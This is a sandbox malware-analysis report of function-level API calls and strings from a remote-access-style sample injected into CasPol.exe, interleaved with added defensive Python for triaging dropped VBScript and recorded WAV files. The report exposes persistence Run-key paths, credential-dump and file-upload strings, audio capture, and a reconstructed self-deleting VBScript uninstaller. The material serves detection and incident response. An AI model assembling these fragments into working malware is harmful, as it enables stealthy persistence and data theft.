• API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
• String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
• API String ID: 4250697656-2665858469
• Opcode ID: 825ed05686e146a340023780a1e1ca3d9c8f627674e2c185f9ef4d809754755e
• Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
• Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                              APIs
                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                              • API String ID: 3797177996-1998216422
                                                                              • Opcode ID: e8105bd03a003de6c5dada70ee61526a4ba484f7441331beee26882055ccc7fa
                                                                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                              • Opcode Fuzzy Hash: e8105bd03a003de6c5dada70ee61526a4ba484f7441331beee26882055ccc7fa
                                                                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
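The string table of this function (On Error Resume Next, Scripting.FileSystemObject, while fso.FileExists(" ... wend, fso.DeleteFile ", fso.DeleteFolder ", fso.DeleteFile(Wscript.ScriptFullName), .vbs, Temp, and the two CurrentVersion\Run key paths), read together with the API summary (TerminateThread, UnhookWindowsHookEx, DeleteFile, ShellExecuteW with the "open" verb, ExitProcess), is the shape of an uninstall routine: a .vbs is dropped under Temp and launched, the process exits, and the script waits in a FileExists loop until the executable can be removed, deletes it and its folder, then deletes itself. The report does not reproduce the dropped script itself. The scanner below is an added example, not code from the report or from the sample; it matches those literal fragments against VBScript text so a responder can triage .vbs files recovered from Temp. Both scripts fed to it are constructed here from the listed fragments, and the hypothetical paths in them are placeholders, not artifacts from the analysis.

```python
import re

# Marker patterns built only from the string fragments in the function's string
# table above. Each name is a hypothetical label chosen for this example.
MARKERS = {
    "suppress_errors": re.compile(r"^\s*On Error Resume Next", re.I | re.M),
    "fso": re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    # busy-wait until the dropped executable can be deleted: while fso.FileExists("...") ... wend
    "wait_loop": re.compile(r"while\s+fso\.FileExists\(.+?\).*?\bwend\b", re.I | re.S),
    "delete_file": re.compile(r'fso\.DeleteFile\s+"', re.I),
    "delete_folder": re.compile(r'fso\.DeleteFolder\s+"', re.I),
    "self_delete": re.compile(r"fso\.DeleteFile\(Wscript\.ScriptFullName\)", re.I),
    "run_key": re.compile(
        r"Software\\Microsoft\\Windows\\CurrentVersion\\(Policies\\Explorer\\)?Run\\", re.I),
}


def scan_script(text: str) -> dict:
    """Return the matched marker names and a verdict for one VBScript body.

    A script that both spins on FileExists and deletes itself is the uninstall
    pattern; three or more markers without that pair is flagged for review.
    """
    hits = [name for name, rx in MARKERS.items() if rx.search(text)]
    if "wait_loop" in hits and "self_delete" in hits:
        verdict = "self-deleting uninstaller"
    elif len(hits) >= 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"hits": hits, "verdict": verdict}


# Constructed sample assembled from the listed fragments; the paths are placeholders.
CONSTRUCTED_UNINSTALLER = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\placeholder\exepath\dropped.exe")
wend
fso.DeleteFile "C:\placeholder\exepath\dropped.exe"
fso.DeleteFolder "C:\placeholder\exepath"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign script: uses FileSystemObject for an ordinary copy.
CONSTRUCTED_BENIGN = r'''Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "C:\placeholder\logs\app.log", "D:\placeholder\backup\app.log"
'''

if __name__ == "__main__":
    for label, body in (("uninstaller", CONSTRUCTED_UNINSTALLER), ("benign", CONSTRUCTED_BENIGN)):
        print(label, scan_script(body))
```

The wait_loop pattern spans lines (re.S) because the real script may have statements between while and wend; the self_delete marker is deliberately kept separate from delete_file, since a script that removes Wscript.ScriptFullName is the strongest single indicator of a drop-and-vanish helper.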
                                                                              APIs
                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                              • SetEvent.KERNEL32 ref: 0041A38A
                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                              • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                              • API String ID: 738084811-1408154895
                                                                              • Opcode ID: 42c4f1343a04b3ab5fe0180adc9416f5c847284e3e603b636eb4f112ec7e7d31
                                                                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                              • Opcode Fuzzy Hash: 42c4f1343a04b3ab5fe0180adc9416f5c847284e3e603b636eb4f112ec7e7d31
                                                                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Write$Create
                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                              • API String ID: 1602526932-4212202414
                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
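The thirteen WriteFile calls above, in order, lay down a 44-byte RIFF/WAVE PCM header: "RIFF", a 4-byte size, "WAVE", "fmt ", a 4-byte chunk size, then 2-byte format tag, 2-byte channel count, 4-byte sample rate, 4-byte byte rate, 2-byte block align, 2-byte bits per sample, "data", and a 4-byte data size. The pointers 00471B02, 00471B04 and 00471B0E are at the nChannels, nSamplesPerSec and wBitsPerSample offsets of a WAVEFORMATEX-shaped structure based at 00471B00, which is consistent with captured audio being flushed to disk; the report does not show whether the two size fields are patched after recording stops. The parser below is an added example, not code from the report or the sample: it validates a recovered file against exactly that layout, checks the fields against each other, and treats zero or oversized size fields as unpatched by falling back to the bytes actually present. The WAV fixture is constructed inline.

```python
import struct
from dataclasses import dataclass

HEADER_LEN = 44  # total of the thirteen WriteFile lengths in the listing


@dataclass
class WavHeader:
    riff_size: int
    fmt_size: int
    format_tag: int
    channels: int
    sample_rate: int
    byte_rate: int
    block_align: int
    bits_per_sample: int
    data_size: int


def build_pcm_wav(channels: int, sample_rate: int, bits: int, pcm: bytes) -> bytes:
    """Constructed fixture: emits fields in the same order as the WriteFile sequence."""
    block_align = channels * bits // 8
    byte_rate = sample_rate * block_align
    fmt = struct.pack("<HHIIHH", 1, channels, sample_rate, byte_rate, block_align, bits)
    return (b"RIFF" + struct.pack("<I", 36 + len(pcm)) + b"WAVE"
            + b"fmt " + struct.pack("<I", 16) + fmt
            + b"data" + struct.pack("<I", len(pcm)) + pcm)


def zero_size_fields(wav: bytes) -> bytes:
    """Simulate a writer that never went back to patch the RIFF and data sizes."""
    return wav[:4] + b"\x00" * 4 + wav[8:40] + b"\x00" * 4 + wav[44:]


def parse_wav_header(buf: bytes) -> WavHeader:
    if len(buf) < HEADER_LEN:
        raise ValueError("shorter than a 44-byte RIFF/WAVE header")
    riff, riff_size, wave = struct.unpack_from("<4sI4s", buf, 0)
    if riff != b"RIFF" or wave != b"WAVE":
        raise ValueError("RIFF/WAVE magic missing")
    fmt_id, fmt_size = struct.unpack_from("<4sI", buf, 12)
    if fmt_id != b"fmt " or fmt_size < 16:
        raise ValueError("fmt chunk missing or truncated")
    tag, ch, rate, byte_rate, align, bits = struct.unpack_from("<HHIIHH", buf, 20)
    data_off = 20 + fmt_size
    if len(buf) < data_off + 8:
        raise ValueError("data chunk header missing")
    data_id, data_size = struct.unpack_from("<4sI", buf, data_off)
    if data_id != b"data":
        raise ValueError("data chunk missing")
    return WavHeader(riff_size, fmt_size, tag, ch, rate, byte_rate, align, bits, data_size)


def is_wav(buf: bytes) -> bool:
    try:
        parse_wav_header(buf)
        return True
    except ValueError:
        return False


def effective_data_size(buf: bytes, h: WavHeader) -> int:
    """Size fields of 0 (never patched) or larger than the file are ignored;
    the payload is whatever follows the data chunk header."""
    present = max(len(buf) - (20 + h.fmt_size + 8), 0)
    if h.data_size == 0 or h.data_size > present:
        return present
    return h.data_size


def duration_seconds(buf: bytes, h: WavHeader) -> float:
    return effective_data_size(buf, h) / h.byte_rate if h.byte_rate else 0.0


def consistency_issues(h: WavHeader) -> list:
    """Cross-field checks: a hand-rolled header with a bad byte rate or block
    align will still play in some tools but betrays a non-standard writer."""
    issues = []
    if h.format_tag != 1:
        issues.append(f"format_tag {h.format_tag} is not PCM (1)")
    if h.block_align != h.channels * h.bits_per_sample // 8:
        issues.append("block_align != channels * bits_per_sample / 8")
    if h.byte_rate != h.sample_rate * h.block_align:
        issues.append("byte_rate != sample_rate * block_align")
    return issues


# Constructed sample: one second of 8 kHz, 16-bit, mono silence.
SAMPLE = build_pcm_wav(1, 8000, 16, bytes(16000))

if __name__ == "__main__":
    hdr = parse_wav_header(SAMPLE)
    print(hdr, duration_seconds(SAMPLE, hdr), consistency_issues(hdr))
```

Run it over every file with a RIFF magic found under the user's profile, not just those with a .wav extension; a recorder that writes the header first and the samples afterwards leaves a parseable but zero-length header behind if it is killed mid-capture, and the fallback above reports the real duration from the bytes that did land on disk.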
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                              • API String ID: 1646373207-165202446
                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 0040BC75
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                              • _wcslen.LIBCMT ref: 0040BD54
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                              • _wcslen.LIBCMT ref: 0040BE34
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                              • API String ID: 1579085052-1280438975
                                                                              • Opcode ID: 8eb7d02a36940a0ff91cf94f27f2f5ad6cb7c1a7bb912e115a66a538726193f8
                                                                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                              • Opcode Fuzzy Hash: 8eb7d02a36940a0ff91cf94f27f2f5ad6cb7c1a7bb912e115a66a538726193f8
                                                                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                              • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                              • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                              • _wcslen.LIBCMT ref: 0041B2DB
                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                              • GetLastError.KERNEL32 ref: 0041B313
                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                              • GetLastError.KERNEL32 ref: 0041B370
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                              • String ID: ?
                                                                              • API String ID: 3941738427-1684325040
                                                                              • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                              • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 3899193279-0
                                                                              • Opcode ID: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                              • Opcode Fuzzy Hash: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                              • API String ID: 1223786279-3931108886
                                                                              • Opcode ID: 92c82ffc14c9d0d4cdbee43c6648559f3b797691cc56d5ec9c55932e8503e442
                                                                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                              • Opcode Fuzzy Hash: 92c82ffc14c9d0d4cdbee43c6648559f3b797691cc56d5ec9c55932e8503e442
                                                                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                              • API String ID: 2490988753-744132762
                                                                              • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                              • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                              APIs
                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                              • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                              • ExitProcess.KERNEL32 ref: 0041CB74
                                                                              • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                              • String ID: Close
                                                                              • API String ID: 1657328048-3535843008
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _free$Info
                                                                              • String ID:
                                                                              • API String ID: 2509303402-0
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                              • API String ID: 1884690901-3066803209
                                                                              APIs
                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
